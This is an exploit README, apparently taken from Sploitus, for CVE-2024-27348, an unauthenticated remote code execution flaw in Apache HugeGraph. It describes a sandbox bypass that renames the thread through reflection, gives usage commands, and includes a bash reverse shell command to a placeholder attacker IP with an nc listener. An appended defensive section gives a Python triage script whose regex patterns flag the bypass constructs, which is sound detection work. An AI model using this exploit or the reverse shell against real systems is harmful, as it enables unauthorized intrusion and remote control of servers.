## https://sploitus.com/exploit?id=CEE028DE-8456-5515-BA5D-B9BC2352D5ED
# CVE-2024-27348: Apache HugeGraph RCE (Advanced Sandbox Bypass)

![Python 3.x](https://img.shields.io/badge/Python-3.x-blue.svg)
![Exploit](https://img.shields.io/badge/Exploit-RCE-red.svg)
![CVE](https://img.shields.io/badge/CVE-2024--27348-orange.svg)

An advanced, highly reliable Proof of Concept (PoC) exploit for **CVE-2024-27348** (Remote Code Execution in Apache HugeGraph Server). 

Unlike many public PoCs that execute commands blindly or fail on complex payloads due to Java's `Runtime.exec()` limitations, this script is designed for **reliability in real-world penetration testing scenarios**.

## โš ๏ธ Disclaimer
> **For Educational and Authorized Testing Purposes Only.**
> This tool is provided for security researchers, penetration testers, and system administrators to verify the vulnerability in authorized environments. The author is not responsible for any misuse or damage caused by this tool.

## ✨ Features & Technical Improvements

This exploit improves upon early public PoCs by addressing three critical issues:

1. **HugeSecurityManager Sandbox Bypass:** The HugeGraph sandbox blocks execution if the calling thread is named `gremlin-server-exec-*` or `task-worker-*`. This payload uses Java Reflection to dynamically rename the execution thread to `BypassThread` before triggering the payload, seamlessly evading the security manager.
2. **Complex Payload Handling:** Instead of `Runtime.getRuntime().exec(String)`, which breaks complex bash commands (like reverse shells) at spaces, this exploit uses `ProcessBuilder` with a properly formatted `List`. This allows for the safe execution of complex payloads with quotes and redirections.
3. **Full Output Reading (Non-Blind RCE):** The script reads the `InputStream` of the executed process using a Java `Scanner` and returns the actual output of the command in the JSON HTTP response. You see exactly what the server sees.

## โš™๏ธ Requirements

- Python 3.x
- `requests` library

Install the required dependencies:
```bash
pip3 install requests
```

## 🚀 Usage

```bash
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
```

**Examples**
1. **Basic Command Execution (Reading output):**

```bash
python3 exploit.py -u http://192.168.X.X:80 -c "whoami"
```

2. **Spawning a Reverse Shell:**
Because the payload handles spaces and quotes correctly, you can inject a standard bash reverse shell directly without needing to base64-encode or stage it:

```bash
# On your attacker machine, start a listener:
nc -lvnp 4444

# Execute the exploit:
python3 exploit.py -u http://192.168.X.X:80 -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
```

## ๐Ÿ” Vulnerability Details
Apache HugeGraph Server exposes a Gremlin API endpoint (/gremlin) that allows users to submit Groovy scripts. Due to insufficient sandboxing in versions prior to patching, an unauthenticated attacker can execute arbitrary operating system commands via Java Reflection.
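As a defensive complement, here is an added example that is not part of this PoC: a small triage helper that a reverse proxy or log pipeline can run over `/gremlin` request bodies to flag scripts carrying the constructs the bypass above depends on (thread renaming, reflection, process spawning, reading the process output). The JSON field name `gremlin` is assumed from the Gremlin Server request format, and both sample scripts are constructed.

```python
import json
import re

# Constructed indicator table. Each pattern names a Java/Groovy construct that
# graph traversals never need but the bypass described above relies on:
# renaming the worker thread, reflection, spawning a process, and reading the
# spawned process's output back into the HTTP response.
INDICATORS = {
    "thread_rename":  re.compile(r"\bcurrentThread\s*\(|\bsetName\s*\("),
    "reflection":     re.compile(r"\bjava\.lang\.reflect\b|\bgetDeclared(Field|Method)s?\s*\(|\bsetAccessible\s*\("),
    "process_spawn":  re.compile(r"\bProcessBuilder\b|\bgetRuntime\s*\(|\.exec\s*\("),
    "process_output": re.compile(r"\bgetInputStream\s*\(|\bScanner\b"),
}

def triage_gremlin(script: str) -> list[str]:
    """Return the sorted names of every indicator class found in a Gremlin script."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script))

def triage_request_body(body: str) -> list[str]:
    """Triage a raw POST body sent to /gremlin.

    The JSON field name "gremlin" is an assumption taken from the Gremlin
    Server request format. A body that is not JSON is scanned verbatim so a
    parse error never lets a request through unchecked."""
    try:
        payload = json.loads(body)
        script = payload.get("gremlin", "") if isinstance(payload, dict) else body
    except ValueError:
        script = body
    return triage_gremlin(script)

# Constructed samples: a legitimate traversal and a deliberately incomplete
# fragment ("..." is not valid Groovy) carrying the constructs the PoC uses.
BENIGN_TRAVERSAL = "g.V().has('name','marko').out('knows').values('name')"
SUSPICIOUS_FRAGMENT = (
    'def t = Thread.currentThread(); t.setName("x"); '
    'def p = new ProcessBuilder(...).start(); new Scanner(p.getInputStream())'
)

if __name__ == "__main__":
    for label, script in (("benign", BENIGN_TRAVERSAL), ("suspicious", SUSPICIOUS_FRAGMENT)):
        body = json.dumps({"gremlin": script, "language": "gremlin-groovy"})
        hits = triage_request_body(body)
        print(f"{label:10s} -> {'BLOCK' if hits else 'allow'} {hits}")
```

A request that trips `thread_rename` or `process_spawn` is worth blocking outright and keeping the full body for the incident record; the other two classes mainly confirm a non-blind attempt.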